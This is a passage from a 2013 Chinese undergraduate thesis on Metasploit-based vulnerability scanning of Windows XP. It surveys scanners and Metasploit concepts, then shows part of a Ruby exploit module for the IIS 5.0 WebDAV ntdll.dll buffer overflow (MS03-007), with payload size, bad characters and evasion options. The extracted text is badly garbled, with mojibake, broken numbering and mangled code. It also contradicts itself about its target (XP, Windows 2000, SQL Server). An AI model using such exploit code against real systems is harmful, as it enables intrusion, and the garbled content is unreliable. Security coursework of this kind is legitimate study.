[軟件工程]基于Metasploit的編程對xp的漏洞掃描的設(shè)計與實現(xiàn)

1、基于 metasploit 的編程對 xp 的漏洞掃描的設(shè) 計與實現(xiàn) the design and realization for the vulnerability scan of the windows xp system based on metasploit framework 學(xué)生： 班級： 09 計本二班 學(xué)號： 學(xué)部： 電子信息學(xué)部 專業(yè)： 計算機(jī)科學(xué)與技術(shù) 指導(dǎo)教師： 職稱： 教授 工作單位： 畢業(yè)設(shè)計（論文）完成時間： 自 2012 年 12 月 至 2013 年 5 月 摘摘 要要 隨著信息時代的飛速發(fā)展，電腦已經(jīng)進(jìn)入了千千萬萬的家庭，如今人們已 經(jīng)離不開電腦。電腦已經(jīng)成為

2、人們必不可少的設(shè)備。在如今的社會中人們市場 部注意電腦的安全問題，很容易因為漏洞導(dǎo)致電腦中木馬和病毒，被黑客竊取 個人隱私信息，因此安全問題已經(jīng)成為一個很重要的問題，最根本的方法就是 將漏洞封堵，不讓黑客有機(jī)會入侵自己的電腦。 文章主要從漏洞是什么以及如何掃描漏洞的概念，到主要的漏洞掃描工具， 然后重點介紹了 metasploit framework 這個漏洞掃描工具的，最后利用 metasploit framework 模擬黑客對 windows xp 系統(tǒng)的漏洞進(jìn)行攻擊。 關(guān)鍵詞關(guān)鍵詞：metasploit；windows xp；exploits abstract with the rap

3、id development of the information age, the computer has entered the thousands on thousands of families, people now have cannot do without computer. the computer has become an indispensable equipment. in todays society people marketing safety first the problems of the computer, is easy because of vul

4、nerabilities in computer virus and trojan horses, hackers steal personal information, so the security issue has become a very important problem, the fundamental method is the leak plugging, dont let the opportunity to invade your computer hackers. this article majoring introduced the fundamental con

5、ceptions of loophole and the loophole scanning firstly. then it let us know some characterizes of metasploit framework. lastly, the author used the metasploit framework imitate hacker attack the sql server of windows xp keywords：metasploit；windows xp；exploits 目目 錄錄 一、漏洞掃描概述一、漏洞掃描概述.1 （一）漏洞.1 1漏洞的定義.

6、1 2漏洞的特點.1 3漏洞的分類.1 （二）漏洞掃描.2 1漏洞掃描的定義.2 2漏洞掃描的目的和意義.2 二、漏洞掃描的工具和現(xiàn)有產(chǎn)品二、漏洞掃描的工具和現(xiàn)有產(chǎn)品.2 (一)漏洞掃描器簡介.2 （二）漏洞掃描的工具.3 1流光簡介.3 2安全焦點的 x-scanner.3 3nessus.4 4俄羅斯的 sss.5 （三）現(xiàn)有的成熟漏洞掃描產(chǎn)品介紹.5 1綠盟科技的極光漏洞掃描器.5 2啟明星辰的天闐漏洞掃描系統(tǒng).5 三、三、metasploit 工具集和工具集和 ruby 語言語言.6 （一）metasploit 工具簡介.6 1metasploit framework 背景.6 2me

7、tasploit framework 的功能模塊.6 3metasploit framework 所具有的主要功能及其任務(wù).7 （二）metasploit 如何工作？.7 1exploit 和有效載荷（payload）.7 2漏洞掃描過程.8 （三）ruby語言簡介.8 1ruby 語言來歷與特點.8 2ruby 語言語法簡介.8 四、四、windows xp 的漏洞掃描設(shè)計的漏洞掃描設(shè)計.9 （一）漏洞名稱及描述.9 （二）受影響系統(tǒng).9 （三）什么是 webdav 組件.10 （四）漏洞產(chǎn)生的原因.10 i （五）由此漏洞掃描的總體設(shè)計.10 五、五、windows xp 的漏洞掃描的實現(xiàn)

8、的漏洞掃描的實現(xiàn).11 五、五、windows xp 的的掃描過程及其解決方案的的掃描過程及其解決方案.17 （一）掃描過程.17 （二）解決方案.18 六、總結(jié)六、總結(jié).19 北京城市學(xué)院 2013 屆畢業(yè)設(shè)計 0 一、漏洞的概述一、漏洞的概述 計算機(jī)對人類的生產(chǎn)活動和社會活動產(chǎn)生了極其重要的影響，并以強(qiáng)大的生 命力飛速發(fā)展。隨著計算機(jī)的發(fā)展，信息的交換變得越來越重要，網(wǎng)絡(luò)的搭建越 來越方便，可是隨著信息化的快速發(fā)展，一些人企圖竊取信息用來牟利，他們利 用軟件的漏洞來控制機(jī)器，因此了解漏洞是安全防范的必備基礎(chǔ)，下面就來一起 認(rèn)識漏洞吧。 ( (一一).).漏洞漏洞 1 11 1 什么是漏洞什

9、么是漏洞 由于系統(tǒng)中主體對對象的訪問是通過訪問控制矩陣實現(xiàn)的，這個訪問控制矩 陣就是安全策略的具體實現(xiàn)，當(dāng)操作系統(tǒng)的操作和安全策略之間相沖突時， 就會產(chǎn)生安全漏洞。 1.21.2 漏洞的特點漏洞的特點 (1)編程過程中出現(xiàn)邏輯錯誤是很普遍的現(xiàn)象 這些錯誤絕大多數(shù)都是由于疏忽造成的。 (2)數(shù)據(jù)處理(例如對變量賦值)比數(shù)值計算更容易出現(xiàn)邏輯錯誤，過小和過 大的程序模塊都比中等程序模塊更容易出現(xiàn)錯誤。 (3)漏洞和具體的系統(tǒng)環(huán)境密切相關(guān)。 在不同種類的軟、硬件設(shè)備中，同種設(shè)備的不同版本之間，由不同設(shè)備構(gòu)成 的不同系統(tǒng)之間，以及同種系統(tǒng)在不同的設(shè)置條件下，都會存在各自不同的安全 漏洞問題。 (4)漏

10、洞問題與時間緊密相關(guān)。 3 3漏洞的分類漏洞的分類 根據(jù)協(xié)議可以分為以下類型的漏洞：cgi(common gateway interface)漏洞、 pop(post office protoco1)漏洞、iis(internet information server)漏洞、ftp(file transfer protoco1)漏洞、ssh(secure shel1)漏洞、http(hypertext transfer protoco1)漏洞、smtp(simple mail transfer protoco1)漏洞、imap(internet message access protoco1)

11、漏洞、rpc(remote procedure cal1)漏洞、finger漏洞和其他漏洞 等。 漏洞還可按可能對系統(tǒng)造成的威脅進(jìn)行分類：越權(quán)訪問漏洞、信息泄漏漏洞、 北京城市學(xué)院 2013 屆畢業(yè)設(shè)計 1 代碼執(zhí)行漏洞(又分為緩沖區(qū)溢出漏洞、編碼錯誤漏洞、類型誤用漏洞)、遠(yuǎn)程登 陸漏洞、拒絕服務(wù)漏洞、逃避審計漏洞、密碼傳輸漏洞等。 ( (二二).).漏洞掃描漏洞掃描 2.12.1漏洞掃描的定義漏洞掃描的定義 漏洞掃描是指基于漏洞數(shù)據(jù)庫，通過掃描等手段對指定的遠(yuǎn)程或者本地計算 機(jī)系統(tǒng)的安全脆弱性進(jìn)行檢測，發(fā)現(xiàn)可利用的漏洞的一種安全檢測（滲透攻擊） 行為。 漏洞掃描的流程圖（見圖1）： 圖2.1

12、:漏洞掃描流程圖 2 22 2 漏洞掃描的漏洞掃描的原理原理 漏洞掃描可以劃分為ping掃描、端口掃描、os探測、脆弱點探測、防火墻掃 描五種主要技術(shù)，每種技術(shù)實現(xiàn)的目標(biāo)和運(yùn)用的原理各不相同。按照tcpip協(xié) 議簇的結(jié)構(gòu)，ping掃描工作在互聯(lián)網(wǎng)絡(luò)層：端口掃描、防火墻探測工作在傳輸層； 0s探測、脆弱點探測工作在互聯(lián)網(wǎng)絡(luò)層、傳輸層、應(yīng)用層。ping掃描確定目標(biāo)主 機(jī)的ip地址，端口掃描探測目標(biāo)主機(jī)所開放的端口，然后基于端口掃描的結(jié)果， 進(jìn)行os探測和脆弱點掃描。 2.2.1 ping 掃描掃描 ping掃描是指偵測主機(jī)ip地址的掃描。ping掃描的目的，就是確認(rèn)目標(biāo)主機(jī)的 tcpip網(wǎng)絡(luò)是否聯(lián)

13、通，即掃描的ip地址是否分配了主機(jī)。對沒有任何預(yù)知信息的黑客而言， ping掃描是進(jìn)行漏洞掃描及入侵的第一步；對已經(jīng)了解網(wǎng)絡(luò)整體ip劃分的網(wǎng)絡(luò)安全人員來講， 也可以借助ping掃描，對主機(jī)的ip分配有一個精確的定位。大體上，ping掃描是基于icmp協(xié) 議的。其主要思想，就是構(gòu)造一個icmp包，發(fā)送給目標(biāo)主機(jī)，從得到的響應(yīng)來進(jìn)行判斷。根 據(jù)構(gòu)造icmp包的不同，分為ech0掃描和nonecho掃描兩種。 失敗 獲取主機(jī) ip 地址 掃描漏洞配置攻擊參數(shù) 對目標(biāo)主機(jī)攻擊 獲取機(jī)內(nèi)資料 成功 北京城市學(xué)院 2013 屆畢業(yè)設(shè)計 2 2.2.2 端口掃描端口掃描 端口掃描用來探測主機(jī)所開放的端口。端

14、口掃描通常只做最簡單的端口 聯(lián)通性測試，不做進(jìn)一步的數(shù)據(jù)分析，因此比較適合進(jìn)行大范圍的掃描：對指定 ip地址進(jìn)行某個端口值段的掃描，或者指定端口值對某個ip地址段進(jìn)行掃描。根 據(jù)端口掃描使用的協(xié)議，分為tcp掃描和udp掃描。 二、二、漏洞掃描工具漏洞掃描工具 ( (一一) )漏洞掃描工具簡介漏洞掃描工具簡介 漏洞掃描器是用于對企業(yè)網(wǎng)絡(luò)進(jìn)行漏洞掃描的一種硬件設(shè)備。 傳統(tǒng)的漏洞掃描器是在硬件內(nèi)部設(shè)定好了自動檢測遠(yuǎn)程或本地主機(jī)安全性弱 點的程序。但基于saas云服務(wù)架構(gòu)的qualysguard提供的漏洞掃描器則僅僅是一個 用戶搜集各類系統(tǒng)情況數(shù)據(jù)的工具，以用于和qualys終端soc中的漏洞數(shù)據(jù)進(jìn)

15、行 比對，以確認(rèn)系統(tǒng)狀況。 通過使用漏洞掃描器，系統(tǒng)管理員能夠發(fā)現(xiàn)所維護(hù)的web服務(wù)器的各種tcp 端口的分配、提供的服務(wù)、web服務(wù)軟件版本和這些服務(wù)及軟件呈現(xiàn)在internet上 的安全漏洞。從而在計算機(jī)網(wǎng)絡(luò)系統(tǒng)安全保衛(wèi)戰(zhàn)中做到有的放矢，及時修補(bǔ)漏 洞，構(gòu)筑堅固的安全長城。 按常規(guī)標(biāo)準(zhǔn)，傳統(tǒng)的漏洞掃描器可以分為兩種類型：主機(jī)漏洞掃描器（host scanner）和網(wǎng)絡(luò)漏洞掃描器（network scanner） 。主機(jī)漏洞掃描器是用于在系統(tǒng) 本地運(yùn)行檢測系統(tǒng)漏洞程序的，如cops、tripewire、tiger等自由軟件。網(wǎng)絡(luò)漏洞 掃描器是指對企業(yè)網(wǎng)絡(luò)架構(gòu)系統(tǒng)或者網(wǎng)站進(jìn)行掃描的硬件設(shè)備。而

16、qualys的掃描 器基于它的運(yùn)作模式，可以同時勝任對主機(jī)、企業(yè)網(wǎng)絡(luò)系統(tǒng)及網(wǎng)站應(yīng)用的掃描。 （二）漏洞掃描的工具（二）漏洞掃描的工具 目前市場上有不少功能強(qiáng)大的掃描器。例如國內(nèi)有流光，x-scan；國外有 tenablie出品的nessus、俄羅斯的shadow security scanner（sss） 。每種工具提供 不同的特性，各具優(yōu)勢。 北京城市學(xué)院 2013 屆畢業(yè)設(shè)計 3 1 1流光流光介紹介紹 流光是一款國產(chǎn)非常優(yōu)秀的綜合掃描工具，不僅具有完善的掃描功能，而且 自帶了很多猜解器和入侵工具，可方便的利用掃描的漏洞進(jìn)行入侵。 啟動流光 工具后可以看到它的主界面，熟悉流光的菜單和界面，

17、利用它對目標(biāo)主機(jī)進(jìn)行漏 洞掃描，是本實驗的主要內(nèi)容。流光fluxay5軟件是一款免費軟件，可從網(wǎng)絡(luò)上下 載之。注意在下載與安裝時，本地主機(jī)要關(guān)閉病毒防火墻，以免本地主機(jī)主上的 防毒軟件將流光fluxay5的某些組件當(dāng)作病毒而拒之門外、甚至刪除。 其具有如下功能： 1、用于檢測pop3/ftp主機(jī)中用戶密碼安全漏洞。 2、163/169雙通。 3、多線程檢測，消除系統(tǒng)中密碼漏洞。 4、高效的用戶流模式。 5、高效服務(wù)器流模式，可同時對多臺pop3/ftp主機(jī)進(jìn)行檢測。 6、最多500個線程探測。 7、線程超時設(shè)置，阻塞線程具有自殺功能，不會影響其他線程。 8、支持10個字典同時檢測。 9、檢測設(shè)

18、置可作為項目保存。 10、取消了國內(nèi)ip限制而且免費。 2 2x-scannerx-scanner 介紹介紹 x-scanner是國內(nèi)最著名的綜合掃描器之一，它完全免費，是不需要安裝的綠 色軟件，界面支持中文和英文兩種語言，包括圖形界面和命令行方式。主要是由 國內(nèi)著名的民間入侵者組織“安全焦點” （http:/）完成，從2000 年的內(nèi)部測試版x-scan v0.2到目前的最新版本x-scan 3.3都凝聚了國內(nèi)眾多入侵 者的心血。x-scan把掃描報告和安全焦點網(wǎng)站相連接，對掃描到的每個漏洞進(jìn)行 “風(fēng)險等級”評估，并提供漏洞描述、漏洞溢出程序，方便網(wǎng)管測試、修補(bǔ)漏洞. x-scanner集成

19、了多種掃描功能于一身，它可以采用多線程方式對指定ip地址 段（或獨立ip地址）進(jìn)行安全漏洞掃描，提供了圖形界面和命令行兩種操作方式， 掃描內(nèi)容包括：標(biāo)準(zhǔn)端口狀態(tài)及端口banner信息、cgi漏洞、rpc漏洞、sql- server默認(rèn)帳戶、ftp弱口令，nt主機(jī)共享信息、用戶信息、組信息、nt主機(jī) 弱口令用戶等。掃描結(jié)果保存在/log/目錄中，index_*.htm為掃描結(jié)果索引文件。 對于一些已知的cgi和rpc漏洞，x-scanner給出了相應(yīng)的漏洞描述、利用程序及 解決方案，節(jié)省了查找漏洞介紹的時間。 北京城市學(xué)院 2013 屆畢業(yè)設(shè)計 4 3 3nessusnessus tenabli

20、e出品的nessus（http：/）最初是一個開源的安全掃描 項目，現(xiàn)在已經(jīng)成為全世界最受歡迎的安全掃描系統(tǒng)，它具有以下特點： (1)最全和最新的漏洞數(shù)據(jù)庫。 由于nessus源于開源項目，在全球范圍內(nèi)有大量人員在開發(fā)對新發(fā)現(xiàn)漏洞的 檢測。其漏洞數(shù)據(jù)庫中的漏洞檢測插件在不斷更新，有一萬多種，分為46類。 (2)遠(yuǎn)程和本地安全檢查。 傳統(tǒng)的網(wǎng)絡(luò)安全掃描系統(tǒng)只能做遠(yuǎn)程開放網(wǎng)絡(luò)服務(wù)的掃描，而nessus被設(shè)計 為client/sever模式，既可以做基于網(wǎng)絡(luò)的掃描也可以做基于主機(jī)的掃描，能顯著 地提高掃描速度并減少誤報和漏報的概率 。 (3)智能的服務(wù)識別。 nessus

21、能識別出運(yùn)行在非標(biāo)準(zhǔn)端口號上的常規(guī)服務(wù)，它是第一個實現(xiàn)該功能 的安全掃描器，同時對于目標(biāo)主機(jī)把同一個服務(wù)同時運(yùn)行在幾個不同端口號的情 況，覆蓋很多協(xié)議（如http、smtp、ftp、snmp、rcp、ldap以及tftp） 、 后門、應(yīng)用程序以及本地漏洞，nessus也能識別并作相應(yīng)的安全檢測。 (4)常規(guī)檢查和徹底檢查。 nessus提供了兩種掃描模式：常規(guī)掃描和完全掃描。常規(guī)掃描就是把一些具 有危險和攻擊性、可能引起被掃描對象崩潰的插件屏蔽，完全掃描則啟用所有插 件(包括有攻擊性的插件)來觀察掃描對象是否能抵御攻擊。 (5)采用基于nasl語言的插件模塊。 nasl(nessus atta

22、ck script language)是nessus的一大特色，它是專為nessus 設(shè)計的腳本語言，用于開發(fā)安全掃描插件，現(xiàn)在己成為業(yè)界事實標(biāo)準(zhǔn)。在負(fù)端采 用了plug-in1的體系，允許用戶加入執(zhí)行特定功能的插件，這插件可以進(jìn)行更快速 和更復(fù)雜的安全檢查。 (6)完整的報告。 nessus有強(qiáng)大的報告輸出能力，可以輸出html、latex、ascii文本、xml 等多種格式。在報告中，它不僅指出發(fā)現(xiàn)存在的安全漏洞及風(fēng)險分析，并且還能 給出相應(yīng)的解決辦法5。 4 4俄羅斯的俄羅斯的 ssssss sss（shadow security scanner）暗影安全掃描器是世界上唯一能夠探測到惠

23、普與思科，和其他網(wǎng)絡(luò)設(shè)備故障的安全漏洞評估掃描器。是非常專業(yè)的安全漏洞 掃描軟件，能掃描服務(wù)器的各種漏洞，包括很多漏洞掃描、帳號掃描、dos掃描 北京城市學(xué)院 2013 屆畢業(yè)設(shè)計 5 等。安裝好sss后，打開sss，它會自動進(jìn)行更新，然后啟動主界面。在系統(tǒng)掃描 完成后，暗影安全掃描器會對收集到的數(shù)據(jù)進(jìn)行分析，查找漏洞和優(yōu)化在服務(wù)器 中可能出現(xiàn)錯誤的選項，并提出解決問題的可能方式。 （三）現(xiàn)有的成熟漏洞掃描產(chǎn)品介紹（三）現(xiàn)有的成熟漏洞掃描產(chǎn)品介紹 1 1綠盟科技的極光漏洞掃描器綠盟科技的極光漏洞掃描器 綠盟科技的極光漏洞掃描器一款成熟的安全掃描產(chǎn)品，它可以掃描多種目標(biāo) 對象，包括各種操作系統(tǒng)（

24、windows，unix/linux等）以及應(yīng)用程序 （web、dbmb等） ，也可以實現(xiàn)并發(fā)掃描，然后進(jìn)行漏洞分析。 極光的控制管理也非常方便，將軟件安裝到pc的桌面，簡單連接到被掃描的 網(wǎng)絡(luò)即可；采用中文圖形界面，操作簡單、易于理解；在掃描過程中，會實時顯 示掃描詳細(xì)信息，將所發(fā)現(xiàn)的漏洞實時進(jìn)行瀏覽。 對于掃描的結(jié)果會提供豐富的報表，例如有匯總漏洞分析報表，基于操作系 統(tǒng)的漏洞分析報表，基于主機(jī)名的漏洞分析報表，基于ip地址漏洞分析報表，基 于危險程度的漏洞分析報表等。報表可以保存為多種文件格式： html、excel、word、rtf、pef、text。報告分析詳細(xì)，會按漏洞的重要程 度

25、自動分類。 軟件可以利用綠盟的升級服務(wù)器自動更新。 2 2啟明星辰的啟明星辰的天闐天闐漏洞掃描系統(tǒng)漏洞掃描系統(tǒng) 天闐威脅檢測與智能分析系統(tǒng)（tds）是啟明星辰推出的新一代網(wǎng)絡(luò)威脅檢 測產(chǎn)品，在繼承傳統(tǒng)ids威脅檢測能力之上，根據(jù)眾多安全專家的經(jīng)驗與知識， 提煉一整套威脅事件智能分析的方法，實現(xiàn)了專家級的威脅智能分析與輔助處理， 是具備人工智能能力的威脅檢測類產(chǎn)品。 這款產(chǎn)品有如下特點： （1）網(wǎng)絡(luò)威脅可視化 天闐威脅檢測產(chǎn)品能對網(wǎng)絡(luò)中實時數(shù)據(jù)流量進(jìn)行分析，準(zhǔn)確發(fā)現(xiàn)各類入侵行 為和網(wǎng)絡(luò)異?，F(xiàn)象。 （2）重點事件可視化 天闐威脅檢測產(chǎn)品內(nèi)置事件輔助預(yù)分析系統(tǒng)，對所有發(fā)現(xiàn)的安全事件進(jìn)行預(yù) 分析，找出

26、需要關(guān)注處理的重點事件并突出顯示。幫助您輕松面對海量報警事件。 （3）事件處理可視化 北京城市學(xué)院 2013 屆畢業(yè)設(shè)計 6 天闐威脅檢測產(chǎn)品提供了詳盡的向?qū)绞录幚碇笇?dǎo)意見，按步驟指導(dǎo)使用 者進(jìn)行安全事件的處理操作，并通過處理過程管理系統(tǒng)，對安全事件進(jìn)行批量自 動處理。降低事件處理的技術(shù)門檻，并同時節(jié)約了事件處理工作量。 （4）安全態(tài)勢可視化 天闐威脅檢測產(chǎn)品可對指定時間段內(nèi)的安全事件進(jìn)行統(tǒng)計分析，并自動對需 要關(guān)注的事件、ip進(jìn)行總結(jié)概述，展現(xiàn)整體網(wǎng)絡(luò)安全態(tài)勢，同時，還能自動與歷 史數(shù)據(jù)進(jìn)行對比分析，幫助您分析網(wǎng)絡(luò)安全發(fā)展趨勢，為您的安全建設(shè)決策提供 支撐依據(jù)。 三、三、metasplo

27、it 工具集和工具集和 ruby 語言語言 （一）（一）metasploitmetasploit 工具簡介工具簡介 1 1metasploitmetasploit frameworkframework 背景背景 metasploit framework(msf)是2003年以開放源碼方式發(fā)布、可自由獲取的開 發(fā)框架，這個環(huán)境為滲透測試、shellcode編寫和漏洞研究提供了一個可靠的平臺。 2.x框架主要是由面向?qū)ο蟮膒erl編程語言編寫，3.x版本采用了ruby編程語言從 頭編寫6。它集成了各平臺上常見的溢出漏洞和流行的shellcode，并且不斷更新， 是安全研究社區(qū)最受歡迎的工具之一，獨

28、立負(fù)責(zé)創(chuàng)建一些針對團(tuán)建和系統(tǒng)的復(fù)雜 攻擊。這個工具能夠提供揭示軟件安全漏洞的強(qiáng)大方法并協(xié)助修補(bǔ)漏洞。 2 2metasploitmetasploit frameworkframework 的功能模塊的功能模塊 metasploit framework包含3個功能模塊：msfconsole、msfweb和 msfupdate。msfupdate用于軟件更新，可以更新最新的漏洞庫和利用代碼。 msfconsole是整個框架中最受歡迎的模塊，所有的功能都可以在該模塊下運(yùn)行。 msfweb是metasploit framework的web組件，支持多用戶，是metasploit圖形化接口。 通過使用m

29、etasploit，組織可以找到以前沒有發(fā)現(xiàn)的安全弱點并開始解決它們。因 此安全工作人員常用metasploit工具來檢測系統(tǒng)的安全性。 3 3metasploitmetasploit frameworkframework 所具有的主要功能及其任務(wù)所具有的主要功能及其任務(wù) 1、支持所有主要的操作系統(tǒng)（windows、linux、sloaris、hpux等） 。 2、設(shè)置選項以及運(yùn)行漏洞具有一致的界面。 3、將有效載荷從漏洞中分離開來，可以根據(jù)用戶喜好進(jìn)行混合以及匹配。 4、集成的編碼以及規(guī)避功能。 北京城市學(xué)院 2013 屆畢業(yè)設(shè)計 7 5、具有易干更新機(jī)制的統(tǒng)一漏洞數(shù)據(jù)庫。 metasplo

30、it 的主要任務(wù)就是，跨越多種漏洞、可以幫助黑客攻擊和控制計算 機(jī)，安全人員也可以利用 metasploit 來加強(qiáng)系統(tǒng)對此類工具的攻擊。 （二）（二）metasploitmetasploit 如何工作？如何工作？ 1 1exploitexploit 和有效載荷（和有效載荷（payloadpayload） metasploit使用exploit和有效載荷抽象出每種攻擊的細(xì)節(jié)，并且使得它們在漏 洞上具有移植性。 （1）exploit 這是負(fù)責(zé)對特定弱點進(jìn)行攻擊的特殊代碼模塊。在試圖對一臺計算機(jī)進(jìn)行滲 透時，必須決定采用什么方式進(jìn)行攻擊。這種選擇反映了所選擇針對的漏洞，以 及所選擇使用的利用方式。

31、metasploit提供了很多跨越多種操作系統(tǒng)以及應(yīng)用程序 的漏洞，它可以對一臺計算機(jī)進(jìn)行多種途徑的滲透。與傳統(tǒng)單一的利用不同， metasploit 僅僅觸發(fā)易受攻擊的條件，不提供任何基于shell 代碼或者高級編碼的 滲透。諸如shell代碼、編碼以及nop sled2均由其他可插入模塊提供。 （2）有效載荷（payload） 一旦漏洞被觸發(fā)，有效負(fù)荷就可以封裝攻擊所要的任何功能。當(dāng)試圖觸發(fā)一 種漏洞之后，下一個步驟就是在受害計算機(jī)上進(jìn)行某種動作，諸如獲得對shell 命 令行的訪問，或者下載后門安裝程序。通過選擇metaspoit有效載荷，就選擇了在 利用漏洞成功時所發(fā)生的事情。在底層協(xié)

32、議中，有效載荷作為與漏洞利用一起發(fā) 送的“shell 代碼”而進(jìn)行編碼。 2 2漏洞掃描過程漏洞掃描過程 metasploit framework利用exploit對目標(biāo)系統(tǒng)進(jìn)行攻擊時，其工作流程與漏洞 掃描過程（見圖1）類似，但又有其獨特性。 metasploit framework的模塊可以嵌入nmap和nessus的功能進(jìn)入到網(wǎng)絡(luò)中。此 時，nmap、nessus可以幫助識別在網(wǎng)絡(luò)中的主機(jī)的系統(tǒng)版本、開放端口、可接入 的服務(wù)以及這些服務(wù)潛在的漏洞。此外，nmap和nessus這些偵查模塊本身就能很 方便的實現(xiàn)端口掃描和漏洞評估。 這些服務(wù)使得metasploit framework初始化

33、是就已經(jīng)是一個非常強(qiáng)大的工具。 我們可以通過命令讓開啟msf的數(shù)據(jù)庫支持服務(wù)，然后通過nmap進(jìn)行端口掃描， 再對目標(biāo)網(wǎng)絡(luò)進(jìn)行自動掃描。這樣將會自動觸發(fā)數(shù)據(jù)庫中的exploit和有效載荷 北京城市學(xué)院 2013 屆畢業(yè)設(shè)計 8 （payload）對目標(biāo)主機(jī)進(jìn)行攻擊7。 但是，本文章采用的是另一種攻擊方式，是針對明確的漏洞，使用明確的 exploit對目標(biāo)進(jìn)行攻擊。 （三）（三）rubyruby 語言簡介語言簡介 1 1rubyruby 語言來歷與特點語言來歷與特點 ruby(紅寶石)是一種純面向?qū)ο蟮慕忉屝缘哪_本語言，由日本人yukihiro matsumoio首先提出和實現(xiàn)。ruby汲取了多

34、種語言的優(yōu)點，如smalltalk的純面向 對象、perl的便利、eiffel的清晰語法。這些使ruby在日本得到的關(guān)注遠(yuǎn)遠(yuǎn)超過了 perl和python。ruby是一種用途廣泛的語言，作為腳本語言，ruby程序可以像其 他腳本語言一樣用于做unix、shell或者windows命令行腳本。ruby的功能卻不僅 僅限于腳本開發(fā)。我們也可以用ruby編寫gui應(yīng)用程序；可以用它做文本的排版、 整理以及提取目錄等；可以用它對網(wǎng)絡(luò)服務(wù)器和數(shù)據(jù)庫進(jìn)行管理；還可以將它用 于網(wǎng)頁服務(wù)，可以用ruby為數(shù)據(jù)庫做界面連接，用ruby生成動態(tài)的網(wǎng)頁等。 2 2rubyruby 語言語法簡介語言語法簡介 ruby

35、的語法簡單、語義清晰，由ruby寫出的程序簡單明了，易于理解和掌握。 與此同時，ruby中的類和模塊都可以動態(tài)擴(kuò)充，變量沒有類型定義。因此，在對 已完成的代碼做擴(kuò)充和修改時，常常不需要對原有代碼上做任何改動，可以方便 程序管理。ruby又是一個開放式語言，如果使用中發(fā)現(xiàn)ruby缺乏某些功能，可以 用ruby或者c語言對ruby進(jìn)行擴(kuò)充8。 在ruby中編程無需聲明變量的類型，這是因為ruby里任何東西都是對象. ruby 變量保存的是對象的引用。ruby具有很好的“兼容性” ，其他語言的程序， 尤其是面向?qū)ο蠛湍_本語言的程序，通過很少改動就能被ruby接受，并且常常會 有更出色的表現(xiàn)。ruby

36、 的有點還在于它具有完整的元類模型、良好的遍歷器、 以及閉包、映像等特征。還有，ruby不僅支持對類的擴(kuò)充，也支持對單獨對象的 擴(kuò)充。 ruby語言是一種動態(tài)語言，你可以在程序中修改先前定義過的類。ruby的變 量可以保有任何類型的數(shù)據(jù)，在ruby語言中，任何東西都是對象，包括其他語言 中的基本數(shù)據(jù)類型，比如整形。任何東西都有值，不管是數(shù)學(xué)或者邏輯表達(dá)式還 是一個語句，都有值。ruby的變量有一定的規(guī)則，以$開頭的一定是全局變量， 以開頭的都是實例變量，而以開頭的是類變量。常數(shù)則以大寫字母開頭； 這種方法，對文本編輯器的命令補(bǔ)全很有幫助，如在vim3下先鍵入$及開頭字母， 北京城市學(xué)院 201

37、3 屆畢業(yè)設(shè)計 9 再敲擊ctrl+p，則可專門補(bǔ)全本文件以及關(guān)聯(lián)文件中的全局變量。已經(jīng)定義的類 可以在運(yùn)行時修改。 四、四、windows xp 漏洞漏洞掃描設(shè)計掃描設(shè)計 （一）漏洞名稱及描述（一）漏洞名稱及描述 名稱：microsoft xp 服務(wù)遠(yuǎn)程堆棧緩沖區(qū)溢出漏洞 描述：客戶端可以通過發(fā)送消息到這個端口來查詢目前可用的連接方式（連 接方式可以是命名管道也可以是 tcp） ，但是此程序存在嚴(yán)重漏洞，當(dāng)客戶端發(fā) 送超長數(shù)據(jù)包時，將導(dǎo)致緩沖區(qū)溢出，惡意黑客利用此漏洞可以在遠(yuǎn)程機(jī)器上執(zhí) 行自己準(zhǔn)備好的惡意代碼。 （二）受影響系統(tǒng)（二）受影響系統(tǒng) - microsoft windows xp

38、（三）漏洞產(chǎn)生的原因（三）漏洞產(chǎn)生的原因 此漏洞產(chǎn)生的具體原因是由于 windows 使用了 ntdll.dll 中的一些 api 函數(shù)， 而這些函數(shù)存在一個緩沖區(qū)溢出漏洞，而 windows 帶有組件對用戶輸入的傳遞給 ntdll.dll 程序處理的請求未作充分的邊界檢查，遠(yuǎn)程入侵者可以通過向提交一個精 心構(gòu)造的超長的數(shù)據(jù)請求而導(dǎo)致發(fā)生緩沖區(qū)溢出，成功利用這個漏洞可以獲得 localsystem 權(quán)限，這意味著入侵者可以獲得主機(jī)的安全控制能力10。所以確切 地說，這個漏洞并不是 iis 造成的，而是 ntdll.dll 里面的一個 api 函數(shù)造成的。 也就是說，很多調(diào)用這個 api 的應(yīng)用

39、程序都存在這個漏洞。 （五）由此漏洞掃描的總體設(shè)計（五）由此漏洞掃描的總體設(shè)計 根據(jù)對漏洞掃描相關(guān)知識的了解，以及收集到的關(guān)于漏洞的信息，由此產(chǎn)生 的設(shè)計如下（見圖 2）： 北京城市學(xué)院 2013 屆畢業(yè)設(shè)計 10 否是 否 本機(jī) metasploit framework 初始化 驗證目標(biāo)主機(jī) 服務(wù)是否開啟 判斷是否存在相關(guān)的 漏洞 進(jìn)行攻 擊測試 結(jié)果匯報 是 圖 2：iis5.0_webdav 漏洞掃描流程 五、五、windows xp漏洞掃描的實現(xiàn)漏洞掃描的實現(xiàn) 我們基于 metasploit 的 framework 基礎(chǔ)上編寫的 ruby 語言的代碼： require msf/core

40、 #ruby 的庫模塊都存放在 .framework3frameworklibmsfcore，其中包括 #exploit.rb 等 class metasploit3 microsoft iis 5.0 webdav ntdll.dll path overflow, description = %q this exploits a buffer overflow in ntdll.dll on windows 2000 through the search webdav method in iis. this particular module only works against windo

41、ws 2000. it should have a reasonable chance of success against any service pack. , author = caojiao , license = msf_license, version = $revision: 9929 $, references = cve, 2003-0109, osvdb, 4467, bid, 7116, msb, ms03-007 , privileged = ture #變量 space 代表許可的 payload 字節(jié)數(shù)的最大值；badchars 代表可能中斷 #payload 的字

42、符，需要在編碼是去除；stackadjustment 是對棧的調(diào)整 payload = space = 512, badchars= x00 x3ax26x3fx25x23x20 x0ax0dx2fx2bx0bx5c, stackadjustment = -3500, , #platform 指向 win 類型 北京城市學(xué)院 2013 屆畢業(yè)設(shè)計 12 platform = win, #targets 自動加載 payloads，采用 msf 的默認(rèn)信息 targets = automatic brute force, , , disclosuredate = may 30 2003, def

43、aulttarget = 0) #下段程序制定了部分變量，在調(diào)用此程序段的時候再賦值 register_evasion_options( optbool.new(invalid_search_request, false, replace the valid xml search with random data, false), optenum.new(http:uri_encode, false, enable uri encoding, none, none,hex-normal, none) , self.class ) deregister_options(http:junk_par

